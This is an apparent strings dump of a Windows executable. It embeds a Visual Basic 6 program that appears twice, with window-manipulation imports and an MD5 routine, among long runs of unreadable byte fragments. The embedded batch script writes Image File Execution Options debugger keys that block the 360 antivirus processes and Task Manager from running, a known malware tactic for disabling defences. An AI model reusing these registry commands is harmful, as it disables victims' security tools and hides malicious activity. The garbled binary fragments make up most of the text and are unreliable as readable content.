466F56C49E765D6FCF792C14F504D5A9
87D594AA52DD916B71E104ADD235928B
386FB518756F06BA1AEBDA0B5E6EBF8C
P4WTSPh
4PPWTPh
SuPHPh
VWXTcjd_
SXP3hl
H<PVLa
H3<Q@PWTP
HX<QPWTP
HX<QPWTP
HX<QPWTP
HX<QPWTP
X<QPWT
VWXT\ajd_
H<PVLa
H3<Q@PWTP
HX<QPWT
HX<QPWTP
HX<QPWT
HX<QPWT
HX<QPWT3C@P
X<QPWT@
<8O<D0QPhM
@PqG|2F
VS^_3[]
VWEZ3X}uZ`jZ_ZTZ(IZ
((7F&F
FXXEEM_d
SVWXEX3}XWWh
S!t!xho
SW3EX\ho
T}J<;u
=((=XX=
=``n=]=MT
VXE.P3j
*9;u)E
y4XX7_[Md
VXEJ3j
#4;u)HE
3;v:9,
XPt9(
3+tSHt=Ht'Ht
?3_[Md
PQXP E
H@@<RQP
XTI@5|o
@4PDSa
@34Q@PWTH
@X4QPWTH
@X4QPWTH
@X4QPWTH
@X4QPWTH
X4QPWT
PLWTSPh
LPPWTPh
SuPHPh
tKWPhI
X6PXP$09H
vLWPhQ
XP4XP,9x
vLWPhJ
XPXP|,9
vLWPhK
XPXP(,9
vLWPhL
XP8XP,`
#tiWPhM
XPXPc
#XX#M^d
XT63SjdX]W"j
tVWXPhN
t!tVWXPhO
PTXPV|
!tOWXPhP
QTPP09Lt0WXPh[
PTXPV @]bX
t!M_^d
WXT(A4F
(v1Wjd(E
4/X}&/E
VPjdWkX
VXPjrW[X
j0d5po
VXPjdWW
VPjdWE
VXPjrW%W
j0d5po
3@M_^d
VXPjdWE
$`Y`VPhs
VXPjdWE
,j0d4W
X/)($)
V(PjdWE
j04dW
SVW33G;EE
xPPtPS|t
(&]&&X&
V(PjdSE
(R#X}D#9#
3@M_^d
W3WS S
EPuWSj
3uLPho
PjgYYj
;tc90t_Vj
VPjdS@
}*VXPjrj
j0d5po
VPjdSY?
PP}*VXPjrj
j0d5po
VPjdS&>
P}*VXPjrj
j0d5po
VPjdS<
P;})VXPjrSX<
j0d5po
+tGHt5Ht#Ht
df8hCVXPhO
+VXPhN
V(PjdWE
VPjrWN9
j045po
YY2XX!
(PXch`Q
(PXh`Q
((wXXfM_^d
df0\Ph
uijdhQ
9hv=LPPPTPXPhQ
Vjn[hQ
f04V5po
XX((|``kZI8Md
u<EPSj
UDSVWh
EEP5po
W3WuEP
E+EWPE+EPE+E
EPW5to
+V4YJ\`
+Vs;5``
3_^[;5l`
SWE30}j
f8@@f98uVW
Wd45po
X``UV`Ph
V(PjnW%
Wld5po
9,(t hR
Xb(WV(Ph
V`PjnW#
W4d5po
((JXX9(
P3Vh<L
M3Fx5Ho
VVWUYu\3A9
VVdV5po
vTl3|j
WXPjdVE
Vd5po
jqYYxMh
WPjd3VE
WXPjiV
j0d5po
W(PjdVE
ddP+@j
XXn]L((;3VVh/
;t?95o
SWPj5|o
SXPjlVE
S(PjdV3
PWdPo095
((XXMl
W3WWEE
uK\Ph`
`PWh4S
v*GGf? w f="
dGtpWq
dstpW,
W'@Pj.} =o
&39u9=o
4PjsWc
NYYShN
t7ShTN
YYShTN
t7Sh(N
YYSh(N
V4Pjd3W
FYYShN
t7ShTN
YYShTN
t7Sh(N
~YYSh(N
twf}66
t7ShTN
YYShTN
t7Sh(N
PYYSh(N
uG`P3PPh
Wdt@Pj d~
lPjfVz
fd[PM_^[w
fDV*^]
_3_^[]
URuPQT|+}
URuPQT|+}
U SVW3S
UREuTq
|P9]tKEP]
PQHE;t
dE{VdXpG
YYu#9`u
YM_^[m
PqXPWV6
W3}X(hZ
`((OXX>-
S df8o
VXWWPX>Yo
;t=PhxU
VX`WWPXXo
;t=PhHU
WWPXXo
VXWWPXlXo
;t=PhT
VXWWPX&Xo
;t=PhT
VXHWWPXWo
;t=PhT
WWPXW9ht_hxT
WWXP(GW4hDT
CdDdPWphZ
804W,E
;LtHXP
P0XPht\
8;t1XQ
PXPh`\
D;t1XQ
PXPhL\
H;t1XQ
PuXPh4\
P;Lu<;
P;Lu8;t+hD[
TD;t+h
TH;t+hZ
XET,23
40TPh^
,YYP;H
SVWXET
P0DPh^
SyYY^W3Gt
t+Ht!Ht
+t+Ht!Ht
YYhPd
PiK -f
Y|jv(T,u
WpVWis
WJ3098
RPTDHQv<Ph0s
YYhPd
VXJOuXP
7v!;hs
XX{M_^d
3SEEEA
E0EPhx
SV3;WE
WVW37(
W/YYhPd
WLVWEs
WYY3M_^d
SVW3;E
@PaPh0
YYt"7h
WSm0Xe
@Pj\y~
y3M_^d
PX4XPhx
PXyXPhx
PX$XPhx
PXiXPhx
P(lh,T
\ 3*qM_^d
E0EPh0
E0EPh0
YY^ltD`
W~VWws
WSYY3_^
PX:zXPh
PXyXPh\
dXXd$b
YYhPd
3((*`M_^d
XHTPrHPhH
PV;YYt
PVh;YYt
PV<;YYt
PX`lHXPh
V@YYh
XPVWV^h
XPViWV
X3M_^d
WXTDk3
Hu3d(hh
TYYh,T
nT``]T\
T#YYh,T
SS((SXXSM_^d
ZN48V0E
NLPVHE
NptVlE
2O@DV<E
hO(,V$E
OdhV`E
PX\VTE
|q!|^%|K=Pq
Wffffff
YY]j`h
3{FF3f
FFW](j
w\SVP9
YE;t:FHE;r
9}uX;u
E;t0FHE;r
9}u";u
EE;u`9=t
3CSVW5`
UQQSVWd5
SVWE3PPPuu
E_^[E]
USVWUj
P(RP$R
t5|$(t
;t$(v(4v
UQPXY]Y[
@@fu+E
fSt8+f
@@fu3[_]
@@fufM
HLNLHPNPP3Y`
vPVLPQE
Y3^_[]
AABBM
tJf9}tDf9Et<}
3F95xr
3MYY[]
31YY[]
SVEW3;
@u+@<v)P
UQSVW>
<"u>"u
3Y[^_5Xr
@B8\t8"u&
UQQSVW39=
W33;u.
;tuf9t
SSS+S@PWSSE;
;YEt!SSuPuWSS
uGY]]W
;rSVWEP
YYt(V5
PYF,;t
PYF4;t
PYF<;t
PYFD;t
PYFH;t
PYFT=pa
Y}F`E;t
FdE;tM
YYt+V5
3@^p3^
3]3@]h
+SVWEePEEEEd
Y_^[QVC20XC00U
33333]^]
]_^[]UL$
f;rof=p
f;r_f=Z
f;rOf=
rBPf;rAf=*
f;r1f=J
f;r!f=
3"p@d;
VDYYFu
WYYuf_]h0
PyYYtF
YYGG3f
YfdtSfitMfotGfxtAfXu
1ht lt
g~Bit!n
(j-_f;u
YtdV(PW
GGf?^u
f]t`FFf9s
jx^f;tZfXtT
S~YYj0[
ptBuf%
F$|3@_^
k3Y@_^]
W3;u4DP
MOI;|9M
WI <}}
MLD3#um
#Mj _^{
;]r;]u&
]#\D\D
FF@@u3
YYE@xE@|EpxM
EE8csmu%Ex
EPQ3VW
GuRYMHxMH|>csmu6~
tu$u u
WEPEPVu u
;EsVS;7|B;w
;Er[_^
Wcsm9>
}EPEPWu u
(u$u ]u
VYY_^[
u u$u uu
tP8csmu,9x
U$Ru u
P 3@_^]j
VW_^]M
It7ht&lt
HHtxHHtt
@@@u3@t
t-RPWS
CYCY~9PM
PvCC>Yt
j ^f;r
It6ht&lt
}]UZtg
@@@u3@t
t-RPWSH/
uH80t8
A80t.F
EVM(^[
uMSW<t
D=VP YYtG;|fE
YYM_^[@=
r$$w@
W=YEMT
tc;t_F,98uXF4;t
YYF0;t
YYv,}v<uYYF@;
PZvDRYYFP;
vP+YYV#Y_^]
3;t/A,
QoYFd^j
W>+~'WPv
7Y}3u;5@
tVPVDYY3BU y
qtb+tG
VbtFHt+
Y]3u;5@
4VYY y
GIt%t)
Gt/KuD$
GKu[^D$
VPVPV5v
@;rD3Ar
@;vAAy
YE;uo>
EtVMf9MZ
_^[j$h
33F9=lu
u2EPVh|
M3F]39}u
SVeYYE;tuWWSuu
P}YEtnu
fNPSuu
E_WEPE
UDSVWj
E3;}M]
@@Ju;t
;tD9]u?8\
EPSRWjQSv
M_^[.x
BG;U|E
EPSSSjQSv
;F(r(8_
t#F(39]
DDDDDDDDDDDDDD
;|P+;E
ue9t-j
*09)Y+
s9~(~
j YjY+
VWj Y}
PjY+3BR0H%
Yj^+3B
QP4YYu
<+3E_^[
|3@]3]
SVWj ^]
EPEPEWPv
@PEP 3;>v
|!3}MEP^
fYY3jY+N
3QQQEE
QPEPEP#
EVPM$^vh
3QQQEE
QPEPEP#
EVPdM$^.h
tAt2t$
@u+@PWV
EPVcM s
u5SSWh|
E SSSSu
]M3G9]u
YE;t}SSuuu
e33Mu;u
V?Y;thE
WreY9]t
ev$dv(dv,dv0dv4dv
dv8dv<d@v@dvDdvHdvLdvPdvTdvXdv\
dv`wdvdodvhgdvl_dvpWdvtOdvxGdv|?d@
PWcY^]
PbYv$Dk
VtbY^]UV3PPPPPPPPU
u5EP3GWh|
V`YEn}
e}UWVSM
[^_UV3PPPPPPPPU
t78t2=`
3@_^[]
PYYtbF
EEuzEE
YXS9YtJU
t1SaYP
t@ t20t$@t
/t(;t$;t
8EPuuu
uWEY>j
u|Yj4h@
u8WW3FVh|
YE;t@E
t!SS9]
u1VY9]t
E;tWWu
EPSu u
YMMjDhh
39}t WWu
tjEEb9}u
WWWWVSWu
;tG3Vj
YYE;t43WWVPVSWu
HHtjHHtF
u9S\UC\
}]39Mt
WVE;Yu
;VWEN@
vOE}SLSFEPSS6E
EMu39S
tfEM_^fC
+t5-t00
uFQ3@}
G0t1|
HHu&Mj
PQYuuO
#fEEEEEEEEEEEE?E
PEPfU}Y
EPMYu}
EPNYuO
EPoEPfEPEPEPPEM
0H;s;s
@UWVSu
F'G8t,A<
WN^xd;=g
tXSjYe
EPKYu}
u5}u,e
MuVQTYYM39U
6UWVSM
B8t6t8t't
M}M}M3~M~M~M#
M{M|@F
g~X\~`Q~F~;~(0~
~|UzpzG{LG
Tuy}`}}X}(}}G
Xt}y^}G
X}qzy|<H
X|@izH
(|Xu|j|_|XT|I|X>|3|X(|
x({{X{X{({lI
({{{p{Xe{I
(K{X@{5{I
w(]zRzJ
8zX-z"z K
z(yyy\K
yyy`y(yXyK
|y0qyfy[y(PyXEyX:y`/y$y(
y(xx`x<L
xmtXxxWtxXxxuxtX{xpx(exZxOxXDxxsltL
wwXw(wwPM
uOuX7wM
w`v(vXv
(vXwvlvN
XRvXGvN
X-v("v
q0qH&rlsr
s$Zs`sxsT#
RegCloseKey
RegSetValueExW
RegCreateKeyExW
RegEnumValueW
RegQueryInfoKeyW
RegOpenKeyExW
RegQueryValueExW
RegEnumKeyW
RegEnumKeyExW
RegDeleteKeyW
RegFlushKey
RegDeleteValueW
RegNotifyChangeKeyValue
ADVAPI32.dll
lstrlenW
EnterCriticalSection
InterlockedIncrement
LeaveCriticalSection
InterlockedDecrement
GetSystemDirectoryW
GetCurrentDirectoryW
InitializeCriticalSection
GetFileAttributesW
GetModuleFileNameW
DeleteCriticalSection
CloseHandle
HeapFree
HeapAlloc
GetProcessHeap
lstrcpyW
lstrcmpW
GetWindowsDirectoryW
CompareFileTime
lstrlenA
GetVersionExW
WaitForMultipleObjects
WaitForSingleObject
SetEvent
GetCurrentThreadId
FreeLibrary
LoadLibraryW
GetCommandLineW
CreateEventW
GetSystemInfo
GetFullPathNameW
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoA
GetCommandLineA
GetVersionExA
HeapReAlloc
RtlUnwind
ExitThread
TlsSetValue
TlsGetValue
GetLastError
CreateThread
ExitProcess
GetProcAddress
GetModuleHandleA
WriteFile
GetStdHandle
GetModuleFileNameA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStringsW
SetHandleCount
GetFileType
TlsFree
SetLastError
TlsAlloc
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
HeapSize
LoadLibraryA
GetACP
GetOEMCP
GetCPInfo
InterlockedExchange
VirtualQuery
GetStringTypeA
GetStringTypeW
VirtualProtect
MultiByteToWideChar
IsBadReadPtr
IsBadCodePtr
SetFilePointer
LCMapStringA
LCMapStringW
GetLocaleInfoA
SetStdHandle
FlushFileBuffers
CreateFileW
SetEndOfFile
ReadFile
KERNEL32.dll
GetTextExtentPointW
GDI32.dll
EnableWindow
SendMessageW
GetDlgItem
MessageBoxW
LoadStringW
wsprintfW
EndDialog
DialogBoxParamW
GetWindowLongW
CallNextHookEx
PostMessageW
IsWindowEnabled
GetKeyState
DestroyWindow
MessageBoxA
wsprintfA
LoadStringA
SetDlgItemTextW
ShowWindow
CheckDlgButton
SetWindowTextW
ReleaseDC
SetDlgItemInt
GetDlgItemInt
GetDlgItemTextW
CheckRadioButton
LoadIconW
SetForegroundWindow
KillTimer
SetTimer
SetFocus
GetFocus
SetWindowPos
AdjustWindowRectEx
GetWindowRect
CreateDialogParamW
GetClientRect
UpdateWindow
PostQuitMessage
UnhookWindowsHookEx
SetWindowsHookExW
DispatchMessageW
TranslateMessage
IsDialogMessageW
PeekMessageW
MsgWaitForMultipleObjects
GetDesktopWindow
USER32.dll
ImageList_Destroy
ImageList_ReplaceIcon
ImageList_Create
COMCTL32.dll
GetSaveFileNameW
comdlg32.dll
ShellExecuteW
SHELL32.dll
CoInitializeSecurity
CoInitialize
CoCreateInstance
CoUninitialize
ole32.dll
OLEAUT32.dll
Ix@oGAkU'9p|B
~QCv)/&D(
uuvHMXB
9;5SM]=];Z] T7aZ%]g']
?Zd;On
7?3=Bz
;1az?aUY~S|
D?$?9'
*?}d|FU>c{
zc%C1<!8G
u7.:3q
#2IZ9W
,%I-64OSk%Y
216E0CC0CE2B89F5744D630BFDA1DBAD
B7E2F86F3BC6F19BD467E1B3C5D0C0C7
4EB232B783B92214BFC1E08897E4C5CE
BDAF1F2F8E76DA90FE5ECCF7E87F9272
8D74A6B21EB755ED409168394829C149
EB48DDE2F3183BA0F9F11FE5B745376C
E24F38EEB4C650F60F883E82B32DDC0E
80F73A217DBD93453C91B622534058EE
8890DDDCFD4EA735E4A984FCBC65E89C
0072D66A64919BB925C055617BA8394B
76A5CFADDC33EE19CF75E7D2FA59422E
8FE7B6379D2575E9367DA2C1BA0A84A4
8F958B52DFC186FC357B8D255F411150
5A1A9EAD47FEA01ED080900AE878D280
F2BAEF1D93E1B4D1E5BBFDD51FC88689
073A16E411B59ED579BDFCFC0D360F0E
4E613331083F11F4F2C5FC49673B90F4
26B61149E2AA73E99150F30D090676CA
E9557EA43BAB87BC145F6C2774A44700
4BA5B381C18E18740D8D6E2462AC0D37
L!This program cannot be run in DOS mode.
#BBBL^B`BdBRichB
`.data
MSVBVM60.DLL
rjrbrrr
rvjrNr:
rrbr*<r}Artr
rr4ur9
r}irWr!NrwrSr+rgr
=r:r7ruBr
Vr2Cr:
rJlrr
rrar5r
r$br/Nrwr
rrpurkrmrIrr0lrF
yE81$HH
M%-:O3f
2.X By:znkzz
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
Timer2
Timer1
Label3
@echo off
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
Label2
Label1
Label1
yE81$H
VB5!6&vb6chs.dll
zE!~@Jke
Class1
yE81$H^pqD
Label1
+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Timer1
Timer2
Label2
Label3
user32
keybd_event
GetForegroundWindow
user32.dll
GetWindowTextA
GetWindowTextLengthA
FindWindowA
SetWindowTextA
SearchFiles
getCaption
+3q"=h
+3qhJu
+3qClass
C:\windows\SysWow64\MSVBVM60.DLL\3
RegisterA
RegisterB
RegisterC
RegisterD
Md5_String_Calc
Md5_File_Calc
GetValues
MD5Init
MD5Final
MD5Update
LongLeftRotate
__vbaVarSetObjAddref
VBA6.DLL
__vbaStrVarVal
__vbaVarCopy
__vbaStrToUnicode
__vbaStrToAnsi
__vbaSetSystemError
__vbaLsetFixstrFree
__vbaVarForNext
__vbaFpI4
__vbaFPInt
__vbaStrR4
__vbaVarLateMemCallLd
__vbaNew
__vbaVarSetObj
__vbaPutOwner4
__vbaStrVarCopy
__vbaPrintFile
__vbaI2Var
__vbaVarForInit
__vbaFileClose
__vbaGetOwner4
__vbaRedim
__vbaFileOpen
__vbaEnd
__vbaFreeObjList
__vbaNew2
__vbaVarDup
__vbaOnError
__vbaFixstrConstruct
__vbaErrorOverflow
__vbaAryDestruct
__vbaFreeVarList
__vbaAryUnlock
__vbaAryLock
__vbaFreeStrList
__vbaVarTstNe
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSet
__vbaVarMove
__vbaError
__vbaFreeStr
__vbaDerefAry1
__vbaStrCopy
__vbaI4Var
__vbaRedimPreserve
__vbaVarAdd
__vbaLenBstr
__vbaFreeVar
__vbaStrCat
__vbaStrMove
__vbaI2I4
__vbaUI1I2
__vbaAryConstruct2
__vbaFpUI1
__vbaVarCat
__vbaStrVarMove
__vbaUI1I4
__vbaVar2Vec
__vbaGosubFree
__vbaExitProc
__vbaGetOwner3
__vbaGosub
__vbaErase
__vbaLenVarB
__vbaAryMove
__vbaGenerateBoundsError
__vbaStrI4
FileType
SourceString
InFile
InputLen
InputBuffer
}}}}}}}|l\EWEPE
EPlPEPt
MJSEP.PSj
M3EPPu
lXEP@Puy0@X
XP7M)j
tSlPEP
XMfXf9X
#fXEPEPj
EPlPEPt
MSEPPSj
MEPPux
uEPEPj
SEP*L]L9E
MEPHEPEPj
MX|PEPj
} jdh<3@
hPEPEPE
} jPh3@
} jXh3@
MEPEPEPEPj
hPfEhOE
uujj E
MhPEPEPE
HP8P(PPPEP|
P|PEPEP9P
P|PDEPEPP
jj MmE
;PEP7E
PxP8PHP(PP
PPPPPPPP{PxPhPgj
EPXPJ
M9hPxPPPPPPPPP
PHP8PXPhPj
PxPx|x
} jPh3@
} jXh3@
1EPEPEPEPj
EPEPEPEPj
XPhPxPPPPPPPPP
P(P8PHPXPhPj
LSVWeE
VuEPgP3
EPHM`EUM
McM+MS
PEPDEEPE
jTh,3@
jPh,3@
EP@Pu>MDE
SVWeEP
SVWeE`
M_h6]@
SVWeEp
MKhJ^@
TSVWeE
]]]]P8;}
VPHEPEP
P$MQMQE
j@WVPM
MQVP4;}
UM]h_@
EP3S#EPS
j\XXSVWeE
PPuVj@YE
M/M'MO
HSVWeE
VEPEP}}}
EWEPEP+P
WVEPEP]E
MJEPEP
3EPEPj
4SVWeE
QV}}}}
QVPLuuB
EPEPEPEPEPEPj
EPEPEPEPEPEPj
E_EEPE
P]}u-EPEPEP"P"
MEPEPj
>EEEPE
Es^uS'EEEEPEP}u;EPEPEP0P0
MEPEPEPj
EEEEPEP}uEPEPEP
EEEEPEP}u1EPEPEP&P&
MEPEPEPj
EEEEPEP}u
EPEPEP
EEPEP}u
EPEPEP
EPEPEPj
EEPEP}unEPEPEPcPc
M)EPEPj
EPEPEPj
SVWeE0
MQMQ}}]V}~PPp
MQMQVPp
MQMQVPp
MQMQVPpFDMH
XSVWeE8
EP]]]]
EEj@_]E
jxX+MQM
MQMQVPpM
MQMQVPpE]E=
MQMQVPpE]E=
MQMQVPpE]E=
MQMEQE
VPOhl@
LSVWeEH
NPj@_e
f;EE~]
E\f;EE
VPPfEf
HSVWeEP
EEEEEEEEh9@
MQEMEQE
MQMQMQu
MQMQMQMQVExjE
MQMQMQM
QMQMQMQMQEVE
MQMQMQM
QMQMQMQMQVEp $]PXj
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME*
QMQMQMQMQVPX
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVPX
MQMQMQM
(QMQMQMQMQVE[]PX
MQMQMQM
,QMQMQMQMQVE\}PX
MQMQMQM
0QMQMQME"
QMQVPX
MQMQMQM
4QMQMQMQMQVEqE
MQMQMQM
8QMQMQMQMQVECy]PX
MQMQMQM
<QMQMQMQMQVE!
MQMQMQMEb%
QMQMQMQMQVP\
MQMQMQM
QMQMQMQMQVE@@E
MQMQMQM
,QMQMQMQMQVEQZ^&]P\j
MQMQMQu
MQMQMQMQVE
MQMQMQM
QMQMQMQMQVP\
MQMQMQM
(QMQMQMQMQVES
MQMQMQM
<QMQMQMQMQVE
MQMQMQM
QMQMQE}MQMQVP\
MQMQMQM
$QMQMQMQMQVE!E
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME
ZE} QMQMQMQMQVP\
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVEE
MQMQMQM
QMQMQMQMQVE
EL*}MQMQMQM
0QMQMQMQMQVP\j
MQMQMQM
QMQMQMQMQVEB9]P`
MQMQMQM
QMQMQMQMQVEqE
_MQMQMQM
,QME"am}QMQMQMQVP`
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVED
MQMQMQM
QMQMQMQMQVEKE
MQME`K}QMQM
QMQMQMQMQVP`
MQMQMQM
(QMQMQMQMQVEpE
MQMQMQM
4QMQMQMQMQVE~(]P`
MQMQMQu
MQMQMQMQVE'E
MQMQMQM
QMQMQMQMQVP`
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVE9
MQMQMQM
0QMQMQEE
MQMQVP`
MQMQMQM
<QMQMQMQMQVE|}P`
MQMQMQM
QMQMQMQMQVEeVE
MQMQMQu
MQMQMQMQVED")E
MQMQMQM
QMQMQMQMQVPd
MQMQMQM
8QMQMQMQMQVE#E
MQMQMQM
QMQMQMQMQVE9E
MQMQMQM
0QMQMQMQMQVEY[eE
QMQMQM
QMQMQMQMQVPd
MQMQMQM
(QMQMQMQMQVE}E
MQMQMQM
QMQMQMQMQVE]E
MQMQMQM
QMQMQMQMEO~oE
MQMQMQM
<QMQMQMQMQVE,E
MQMQMQM
QMQMQMQMQVE
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
MQMQMQMQVPd
MQMQMQM
,QMQMQMQMQVE5:E
MQMQMQM
QMQMQMQMQVE*E
MQMQMQM
$QMQMQMQMQVE
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
S3Wf8f
f;]]]]
QWVPlEM
QWVPlEM
QWVPlEM
QWVPlEM
SVWeE`
V3EEEE
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaError
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaErase
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaPutOwner4
__vbaI2I4
DllFunctionCall
__vbaFpUI1
__vbaRedimPreserve
__vbaStrR4
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
EVENT_SINK_Release
__vbaNew
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaUI1I4
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
__vbaGetOwner4
__vbaI2Var
__vbaLsetFixstrFree
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaVarSetObj
__vbaFreeStrList
__vbaDerefAry1
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaI4Var
__vbaVarAdd
__vbaAryLock
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaFpI4
__vbaVarCopy
__vbaVarSetObjAddref
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
__vbaLenVarB
_CItan
__vbaAryUnlock
__vbaFPInt
__vbaVarForNext
_CIexp
__vbaFreeStr
__vbaFreeObj
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
C:\Users\Administrator\Desktop\
2.X.pdb
49431AAD794634219A639C6C541A3D96
E8A7EA76E1854769DE340A9B8C435D05
78493ED5434848C66C6270A8C3C17E8F
96782471E1F42F0E5192DEF8D34ADF52
62A15B7205C4F5C57A85B0D3069C33A9
9FFC7CA89A523E8929336726D7773437
D3436C5275093FAF2564D1686B09A90D
E3338793698E1606AF47D324D912D726
EC9586D14581D3BBA0F9E75718021738
7922F4DB6BD4AF02B061CB04F35BE848
L!This program cannot be run in DOS mode.
#BBBL^B`BdBRichB
`.data
MSVBVM60.DLL
rjrbrrr
rvjrNr:
rrbr*<r}Artr
rr4ur9
r}irWr!NrwrSr+rgr
=r:r7ruBr
Vr2Cr:
rJlrr
rrar5r
r$br/Nrwr
rrpurkrmrIrr0lrF
yE81$HH
M%-:O3f
2.X By:znkzz
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
Timer2
Timer1
Label3
@echo off
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
Label2
Label1
Label1
yE81$H
VB5!6&vb6chs.dll
zE!~@Jke
Class1
yE81$H^pqD
Label1
+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Timer1
Timer2
Label2
Label3
user32
keybd_event
GetForegroundWindow
user32.dll
GetWindowTextA
GetWindowTextLengthA
FindWindowA
SetWindowTextA
SearchFiles
getCaption
+3q"=h
+3qhJu
+3qClass
C:\windows\SysWow64\MSVBVM60.DLL\3
RegisterA
RegisterB
RegisterC
RegisterD
Md5_String_Calc
Md5_File_Calc
GetValues
MD5Init
MD5Final
MD5Update
LongLeftRotate
__vbaVarSetObjAddref
VBA6.DLL
__vbaStrVarVal
__vbaVarCopy
__vbaStrToUnicode
__vbaStrToAnsi
__vbaSetSystemError
__vbaLsetFixstrFree
__vbaVarForNext
__vbaFpI4
__vbaFPInt
__vbaStrR4
__vbaVarLateMemCallLd
__vbaNew
__vbaVarSetObj
__vbaPutOwner4
__vbaStrVarCopy
__vbaPrintFile
__vbaI2Var
__vbaVarForInit
__vbaFileClose
__vbaGetOwner4
__vbaRedim
__vbaFileOpen
__vbaEnd
__vbaFreeObjList
__vbaNew2
__vbaVarDup
__vbaOnError
__vbaFixstrConstruct
__vbaErrorOverflow
__vbaAryDestruct
__vbaFreeVarList
__vbaAryUnlock
__vbaAryLock
__vbaFreeStrList
__vbaVarTstNe
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSet
__vbaVarMove
__vbaError
__vbaFreeStr
__vbaDerefAry1
__vbaStrCopy
__vbaI4Var
__vbaRedimPreserve
__vbaVarAdd
__vbaLenBstr
__vbaFreeVar
__vbaStrCat
__vbaStrMove
__vbaI2I4
__vbaUI1I2
__vbaAryConstruct2
__vbaFpUI1
__vbaVarCat
__vbaStrVarMove
__vbaUI1I4
__vbaVar2Vec
__vbaGosubFree
__vbaExitProc
__vbaGetOwner3
__vbaGosub
__vbaErase
__vbaLenVarB
__vbaAryMove
__vbaGenerateBoundsError
__vbaStrI4
FileType
SourceString
InFile
InputLen
InputBuffer
}}}}}}}|l\EWEPE
EPlPEPt
MJSEP.PSj
M3EPPu
lXEP@Puy0@X
XP7M)j
tSlPEP
XMfXf9X
#fXEPEPj
EPlPEPt
MSEPPSj
MEPPux
uEPEPj
SEP*L]L9E
MEPHEPEPj
MX|PEPj
} jdh<3@
hPEPEPE
} jPh3@
} jXh3@
MEPEPEPEPj
hPfEhOE
uujj E
MhPEPEPE
HP8P(PPPEP|
P|PEPEP9P
P|PDEPEPP
jj MmE
;PEP7E
PxP8PHP(PP
PPPPPPPP{PxPhPgj
EPXPJ
M9hPxPPPPPPPPP
PHP8PXPhPj
PxPx|x
} jPh3@
} jXh3@
1EPEPEPEPj
EPEPEPEPj
XPhPxPPPPPPPPP
P(P8PHPXPhPj
LSVWeE
VuEPgP3
EPHM`EUM
McM+MS
PEPDEEPE
jTh,3@
jPh,3@
EP@Pu>MDE
SVWeEP
SVWeE`
M_h6]@
SVWeEp
MKhJ^@
TSVWeE
]]]]P8;}
VPHEPEP
P$MQMQE
j@WVPM
MQVP4;}
UM]h_@
EP3S#EPS
